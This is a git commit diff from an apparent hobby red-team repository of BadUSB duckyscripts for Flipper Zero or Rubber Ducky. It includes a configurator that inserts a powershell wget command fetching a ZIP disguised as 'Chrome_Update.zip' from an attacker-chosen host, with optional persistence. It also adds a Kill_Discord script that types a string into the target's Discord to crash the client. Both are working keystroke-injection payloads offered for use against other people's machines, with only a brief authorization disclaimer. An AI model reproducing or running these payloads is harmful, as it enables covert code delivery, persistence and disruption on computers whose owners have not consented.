3 Commits

Author SHA1 Message Date
Fr3ki b13c5e1f38 Added Kill_Discord 2024-04-13 15:11:27 -06:00
Fr3ki 578fb6b512 Fix bug with URLs and add option to bypass the ZIP folder creation 2023-10-31 16:33:00 -06:00
Fr3ki 9791e1b886 Fix bug with URLs and add option to bypass the ZIP folder creation 2023-10-31 16:29:20 -06:00
5 changed files with 41 additions and 19 deletions
+1 -2
View File
@@ -4,8 +4,6 @@ This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose
------------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
1) Replace the YOUR_IP value in GooseDropper.txt with your IP. 1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
@@ -21,6 +19,7 @@ Currently there is no auto-configurator for Windows but it's in the works. Steps
6) Copy to your Flipper or Rubber-Ducky and PWN! 6) Copy to your Flipper or Rubber-Ducky and PWN!
-------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------
**Important Notes:** **Important Notes:**
Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible. Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
+10 -2
View File
@@ -21,9 +21,9 @@ elif [ "${DL}" == "2" ];
then then
#Get your URL #Get your URL
read -p "Enter your URL: " SRC read -p "Enter your URL: " SRC
SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
#Add your URL to the payload #Add your URL to the payload
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt
#Remind users to have the zip ready #Remind users to have the zip ready
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
@@ -36,9 +36,14 @@ else
fi fi
read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
#Check if Desktop Goose is present in this directory #Check if Desktop Goose is present in this directory
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
if [ "${COMP,,}" == "y" ];
then
if [ "${GOOSE}" == "" ]; if [ "${GOOSE}" == "" ];
then then
echo "Desktop Goose is not present in this directory, download it, or move it here" echo "Desktop Goose is not present in this directory, download it, or move it here"
@@ -52,6 +57,9 @@ else
rm -rf "Desktop Goose v0.31"* Update rm -rf "Desktop Goose v0.31"* Update
clear clear
fi fi
else
break
fi
read -p "Configure Persistence? [Y/N]: " PERSIST read -p "Configure Persistence? [Y/N]: " PERSIST
+9
View File
@@ -0,0 +1,9 @@
Kill_Discord is a duckyscript that does exactly what the name implies.
As of April 2024 the string "http://./\<#0>: ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
This script opens Discord on the target machine and pastes that string into the first available text box.
Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.
@@ -0,0 +1,12 @@
DELAY 500
GUI r
DELAY 500
STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
DELAY 500
ENTER
DELAY 2000
CTRL k
DELAY 100
ENTER
DELAY 500
STRING http://./\<#0>: ://./<#0>
-6
View File
@@ -1,6 +0,0 @@
# Misadventures
This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
Licence: https://www.gnu.org/licenses/gpl-3.0.html